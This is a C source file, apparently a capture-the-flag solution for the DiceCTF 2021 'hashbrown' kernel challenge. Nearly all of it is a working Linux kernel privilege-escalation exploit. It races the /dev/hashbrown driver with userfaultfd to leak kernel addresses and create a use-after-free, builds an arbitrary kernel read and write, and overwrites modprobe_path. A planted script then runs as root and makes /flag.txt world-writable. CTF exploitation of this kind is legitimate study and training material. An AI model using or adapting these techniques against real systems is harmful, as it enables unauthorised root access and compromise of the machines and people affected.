ctf/dice-2021-hashbrown/exploit-task.c

/*
 * author: @meowmeowxw
 *
 * Main ideas: https://www.willsroot.io/2020/10/cuctf-2020-hotrod-kernel-writeup.html
 * https://www.willsroot.io/2021/02/dicectf-2021-hashbrown-writeup-from.html
 *
 *
 *
 * https://pr0cf5.github.io/ctf/2019/10/10/balsn-ctf-krazynote.html
 * https://blog.lexfo.fr/cve-2017-11176-linux-kernel-exploitation-part3.html
 * https://rpis.ec/blog/tokyowesterns-2019-gnote/
 * https://duasynt.com/blog/linux-kernel-heap-spray
 * https://syst3mfailure.github.io/hotrod
 * https://github.com/esanfelix/r2con2019-ctf-kernel/blob/master/solution/exploit_kaslr_cred.c#L268 FIND TASK_STRUCT
 */
#define _GNU_SOURCE

#include <fcntl.h>
#include <signal.h>
#include <sys/wait.h>
#include <sys/resource.h>
#include <inttypes.h>
#include <linux/userfaultfd.h>
#include <poll.h>
#include <pthread.h>
#include <semaphore.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sched.h>
#include <sys/mman.h>
#include <sys/prctl.h>
#include <sys/shm.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <time.h>
#include <time.h>
#include <unistd.h>

#define DEVICE_NAME "/dev/hashbrown"
#define CLASS_NAME  "/dev/hashbrown"

#define ADD_KEY 0x1337
#define DELETE_KEY 0x1338
#define UPDATE_VALUE 0x1339
#define DELETE_VALUE 0x133a
#define GET_VALUE 0x133b

#define SIZE_ARR_START 0x10
#define SIZE_ARR_MAX 0x200
#define MAX_ENTRIES 0x400
#define MAX_VALUE_SIZE 0xb0
#define GET_THRESHOLD(size) size - (size >> 2)

#define OK 0
#define INVALID 1
#define EXISTS 2
#define NOT_EXISTS 3
#define MAXED 4

#define THREADS 8
#define DEFAULT_SIZE 0xb0
#define PAGESIZE 0x1000

/*
#define COMM 0x570
#define CRED 0x560
#define TASKS 0x2c8
// #define CRED 0x518
#define CRED 0x6a8
#define COMM 0x6b8
#define TASKS 0x3e8
*/


#define COMM 0x708
#define CRED 0x6f8
#define TASKS 0x438

typedef struct {
    uint32_t key;
    uint32_t size;
    char *src;
    char *dest;
} request_t;

typedef struct {
    int error_code;
    const char* error_message;
} error_type;

uint32_t get_hash_idx(uint32_t key, uint32_t size);
request_t *create_request(uint32_t key, uint32_t size);
void free_request(request_t *r);
void *add(request_t *arg);
void *delete(request_t *arg);
void *race_userfault(void *arg);
void (*race_function)(void *);
void leak_function(request_t *req);
void print_leak(uint64_t *leak, uint32_t size);
void init_error();
void init_commands();
int userfaultfd(int flags);
int register_ufd(uint64_t page);
long update_value(int fd, uint32_t key, uint32_t size, char *src);
void make_flag_readable();
void read_leak(uint64_t address, uint32_t size, uint32_t uaf_entry, uint32_t idx);

uint64_t uf_page;
char *error[] = {"OK    ", "INVALID", "EXISTS", "NOT_EXISTS", "MAXED"};
char *default_add = "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa";
char *default_del = "bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb";
uint64_t base, init_task, modprobe_path;
uint64_t leak[0x300];
int uaf = 0;
int fd;
request_t *del_r;

int main(int argc, char **argv) {
    struct timespec t;
    pthread_t thread;
    request_t *add_r;
    request_t evil;
    uint32_t added = 0;
    int threshold;
    int ufd;
    int size;
    pid_t pid;
    int ret;
    int i = 0;
    uint32_t j = 0, h1 = 0, h2 = 0;
    size = SIZE_ARR_START;
    threshold = GET_THRESHOLD(size);

    fd = open(DEVICE_NAME, O_RDONLY);

    del_r = create_request(0, 0x20);
    add_r = create_request(1, DEFAULT_SIZE);
    strcpy(del_r->src, "b");
    strcpy(add_r->src, default_add);

    add(del_r);

    for (i = 1; i < 12; i++) {
        add_r->key = i;
        add(add_r);
    }

    ufd = register_ufd(0xaaaa000);
    printf("[*] ufd: %d\n", ufd);
    race_function = (void *)leak_function;

    if (pthread_create(&thread, NULL, (void *)race_userfault, (void *)(intptr_t)ufd) != 0) {
        perror("pthread");
    }

    add_r->key = i++;
    add_r->src = (char *)uf_page;
    del_r->key = 0;
    add(add_r);

    pthread_join(thread, NULL);

    ret = ioctl(fd, GET_VALUE, del_r);
    if (ret == OK) {
        puts("[*] leak");
    } else {
        puts("NO LEAK\n");
        return 1;
    }

    memcpy(leak, del_r->dest, 0x20);
    print_leak(leak, 0x4);

    base = leak[1] - 0xb0dca0;
    // init_task = base + 0xa13720;
    // init_task = 0xffffffff81a13940; NOKASLR
    init_task = base + 0xa13940;
    modprobe_path = base + 0xa46fe0;
    printf("[*] base address:   0x%016lx\n", base);
    printf("[*] init task:      0x%016lx\n", init_task);
    printf("[*] modprobe_path:  0x%016lx\n", modprobe_path);

    for (; i <= 22; i++) {
        add_r->key = i;
        add(add_r);
    }

    // add_r has equal size of del_r
    add_r = create_request(0x401, 0x20);
    strcpy(add_r->src, "cccccccccccccccccccccccccccccccc");
    add(add_r);

    ufd = register_ufd(0xcafe000);
    printf("[*] ufd: %d\n", ufd);
    race_function = (void *)delete;
    del_r->key = 0x401;

    if (pthread_create(&thread, NULL, (void *)race_userfault, (void *)(intptr_t)ufd) != 0) {
        perror("pthread");
    }

    add_r->key = i++;
    add_r->src = (char *)uf_page;
    add(add_r);

    pthread_join(thread, NULL);

    ioctl(fd, GET_VALUE, del_r);
    memcpy(leak, del_r->dest, 0x20);
    print_leak(leak, 0x4);
    // free_request(add_r);

    /*
     * Basically we were able to delete a 0x20 chunk and maintain the pointer
     * to it. What happens if we reallocate some request_t structure? since a 
     * structure request_t occupies 0x20, we will probably reallocate the deleted
     * chunk (UAF).
     *
     * Now we can overwrite the request_t.src pointer to modprobe_path and 
     * overwrite with UPDATE_VALUE.
     *
     * We set add_r->size to DEFAULT_SIZE = 0xb0, in this way we are sure to do
     * UAF against a request_t and not a request_t->value.
     * 
     */

    add_r = create_request(i, DEFAULT_SIZE);

    for (; i < 0x40; i++) {
        add_r->src[0] = (unsigned char)i;
        add_r->key = i;
        add(add_r);
    }

    del_r->key = 0x401;
    ret = ioctl(fd, GET_VALUE, del_r);
    if (ret == OK) {
        puts("[*] use-after-free");
    } else {
        puts("NO UAF\n");
        return 100;
    }

    uint32_t uaf_entry = *(int *)del_r->dest;
    printf("[!] uaf entry: %u\n", uaf_entry);
    memcpy(leak, del_r->dest, 0x20);
    print_leak(leak, 0x4);

    prctl(PR_SET_NAME, "EXPLOIT4", NULL, NULL, NULL);

    char s[0x10];
    j = 0;
    uint64_t current = init_task;
    // OR DO WHILE UNTIL YOU FIND THE RIGHT ONE BUT CRASH

    uint64_t ksymtab_prepare_kernel_cred = base + 0x995158;
    uint64_t ksymtab_commit_creds = base + 0x992104;
    uint64_t prepare_kernel_cred = ksymtab_prepare_kernel_cred;
    uint64_t commit_creds = ksymtab_commit_creds;
    printf("[*] ksymtab_prepare_kernel_cred: 0x%016lx\n", ksymtab_prepare_kernel_cred);
    printf("[*] ksymtab_commit_creds:        0x%016lx\n", ksymtab_commit_creds);
    read_leak(ksymtab_prepare_kernel_cred, 0x20, uaf_entry, 0x401);
    prepare_kernel_cred = ksymtab_prepare_kernel_cred + (int)leak[0];
    read_leak(ksymtab_commit_creds, 0x20, uaf_entry, 0x401);
    commit_creds = ksymtab_commit_creds + (int)leak[0];
    printf("[*] prepare_kernel_cred:        0x%016lx\n", prepare_kernel_cred);
    printf("[*] commit_creds:               0x%016lx\n", commit_creds);

    for (i = 0; i < 0x4; i++) {
        printf("\n\n\n[*] task_struct: %d\n", i);
        printf("current: 0x%16lx\n", current);

        read_leak(current + COMM, 0x20, uaf_entry, 0x401);
        strcpy(s, (char *)leak);
        printf("COMM: %s\n", s);
        memset(s, 0, 0x10);

        read_leak(current + TASKS, 0x20, uaf_entry, 0x401);
        current = leak[0] - TASKS;
    }


    // modprobe_path exploitation
    evil.key = uaf_entry;
    evil.size = 0x20;
    evil.src = (char *)modprobe_path;
    evil.dest = NULL;

    // https://kileak.github.io/ctf/2019/xctf-hackme/ modprobe_path trick
    del_r->key = 0x401;
    memcpy(del_r->src, (void *)&evil, sizeof(evil));
    ioctl(fd, UPDATE_VALUE, del_r);

    del_r->key = uaf_entry;
    strcpy(del_r->src, "/home/ctf/w");
    ioctl(fd, UPDATE_VALUE, del_r);
    printf("UPDATE: %u\tRET: %s\n", del_r->key, error[ret]);

    make_flag_readable();


    return 0;
}

void read_leak(uint64_t address, uint32_t size, uint32_t uaf_entry, uint32_t idx) {
    int ret;
    char dest_evil[0x100];
    char dest_update[0x100];
    char src[0x100];

    request_t evil = {
        .key = uaf_entry,
        .size = 0x20,
        .src = (char *)address,
        .dest = dest_evil
    };

    request_t update = {
        .key = idx,
        .size = 0x20,
        .src = src,
        .dest = dest_update,
    };

    memset(dest_evil, 0, 0x100);
    memcpy(update.src, (void *)&evil, sizeof(evil));
    ret = ioctl(fd, UPDATE_VALUE, &update);
    printf("UPDATE: %u\tRET: %s\n", update.key, error[ret]);

    update.key = evil.key;
    ret = ioctl(fd, GET_VALUE, &update);
    printf("GET_VALUE: %u\tRET: %s\n", update.key, error[ret]);

    memcpy(leak, dest_update, 0x20);
    print_leak(leak, 0x4);
}

request_t *create_request(uint32_t key, uint32_t size) {
    request_t *r = calloc(1, sizeof(request_t));
    r->key = key;
    r->size = size;
    r->src = calloc(1, size);
    r->dest = calloc(1, size);
    return r;
}

void free_request(request_t *r) {
    free(r->src);
    free(r->dest);
    free(r);
}

void *add(request_t *arg) {
    int ret;
    ret = ioctl(fd, ADD_KEY, arg);
    printf("ADD_KEY  \tret: %s\t\tr->src: %s\t\tr->dest: %s\tr->key: %d\n", error[ret], arg->src, arg->dest, arg->key);
    return NULL;
}

void *delete(request_t *arg) {
    int ret;
    ret = ioctl(fd, DELETE_VALUE, arg);
    printf("DELETE_VALUE\tret: %s\t\tr->src: %s\t\tr->dest: %s\tr->key: %d\n", error[ret], arg->src, arg->dest, arg->key);
    return NULL;
}

uint32_t get_hash_idx(uint32_t key, uint32_t size) {
    uint32_t hash;
    key ^= (key >> 20) ^ (key >> 12);
    hash = key ^ (key >> 7) ^ (key >> 4);
    return hash & (size - 1);
}

int userfaultfd(int flags) {
    return syscall(SYS_userfaultfd, flags);
}

int register_ufd(uint64_t page) {
    int fd = 0;
    int memsize = 0x1000;
    uf_page = page;
    struct uffdio_api api = { .api = UFFD_API };

    uf_page = (uint64_t)mmap((void *)uf_page, 0x1000, PROT_READ|PROT_WRITE, MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE, 0, 0);
    if ((void *)uf_page == MAP_FAILED) {
        perror("mmap uf_page");
        exit(2);
    }

    if ((fd = userfaultfd(O_NONBLOCK)) == -1) {
        fprintf(stderr, "++ userfaultfd failed: %m\n");
        exit(-1);
    }

    if (ioctl(fd, UFFDIO_API, &api)) {
        fprintf(stderr, "++ ioctl(fd, UFFDIO_API, ...) failed: %m\n");
        exit(-1);
    }
    if (api.api != UFFD_API) {
        fprintf(stderr, "++ unexepcted UFFD api version.\n");
        exit(-1);
    }

    /* mmap some pages, set them up with the userfaultfd. */
    struct uffdio_register reg = {
        .mode = UFFDIO_REGISTER_MODE_MISSING,
        .range = {
            .start = uf_page,
            .len = memsize
        }
    };

    if (ioctl(fd, UFFDIO_REGISTER,  &reg) == -1) {
        fprintf(stderr, "++ ioctl(fd, UFFDIO_REGISTER, ...) failed: %m\n");
        exit(-1);
    }

    return fd;
}

void *race_userfault(void *arg) {
    // request_t *req = create_request(0, 0x20);
    int ufd = (intptr_t)arg;
    char uf_buffer[0x1000];
    struct pollfd evt = { .fd = ufd, .events = POLLIN };

    while (poll(&evt, 1, -1) > 0) {
        /* unexpected poll events */
        if (evt.revents & POLLERR) {
            perror("poll");
            exit(-1);
        } else if (evt.revents & POLLHUP) {
            perror("pollhup");
            exit(-1);
        }
        struct uffd_msg fault_msg = {0};
        if (read(ufd, &fault_msg, sizeof(fault_msg)) != sizeof(fault_msg)) {
            perror("read");
            exit(-1);
        }
        char *place = (char *)fault_msg.arg.pagefault.address;
        if (fault_msg.event != UFFD_EVENT_PAGEFAULT
                || (place != (void *)uf_page && place != (void *)uf_page + PAGESIZE)) {
            fprintf(stderr, "unexpected pagefault?.\n");
            exit(-1);
        }
        if (place == (void *)uf_page) {
            printf("[+] got page fault at address %p, nice!\n", place);
            printf("[*] now delete %u\n",del_r->key);
            (*race_function)(del_r);
            printf("[*] done! now releasing ufd to finish exit\n");

            /* release by copying some data to faulting address */
            struct uffdio_copy copy = {
                .dst = (long) place,
                .src = (long) uf_buffer,
                .len = PAGESIZE
            };
            if (ioctl(ufd, UFFDIO_COPY, &copy) < 0) {
                perror("ioctl(UFFDIO_COPY)");
                exit(-1);
            }
            break;
        }
    }
    close(ufd);
    // free_request(req);
    return NULL;
}

void leak_function(request_t *req) {
    int shmid;
    void *shmaddr;
    delete(req);
    if ((shmid = shmget(IPC_PRIVATE, 100, 0600)) == -1) {
        perror("shmget error");
        exit(10);
    }
    shmaddr = shmat(shmid, NULL, 0);
    if (shmaddr == (void *)-1) {
        perror("shmat error");
        exit(11);
    }
}

void print_leak(uint64_t *leak, uint32_t size) {
    int i = 0;
    for (i = 0; i < size; i++) {
        printf("0x%016lx\t", leak[i]);
        if (!((i + 1) % 2)) {
            printf("\n");
        }
    }
    printf("\n");
}

long update_value(int fd, uint32_t key, uint32_t size, char *src) {
    request_t request;
    request.key = key;
    request.size = size;
    request.src = src;

    return ioctl(fd, UPDATE_VALUE, (unsigned long)&request);
}

void make_flag_readable() {
    char filename[65];
    memset(filename, 0, sizeof(filename));
    system("echo -ne '\\xff\\xff\\xff\\xff' > /home/ctf/roooot");
    system("chmod +x /home/ctf/roooot");
    system("echo -ne '#!/bin/sh\nchmod 777 /flag.txt' > /home/ctf/w\n");
    system("chmod +x /home/ctf/w");
    system("/home/ctf/roooot");
    return;

}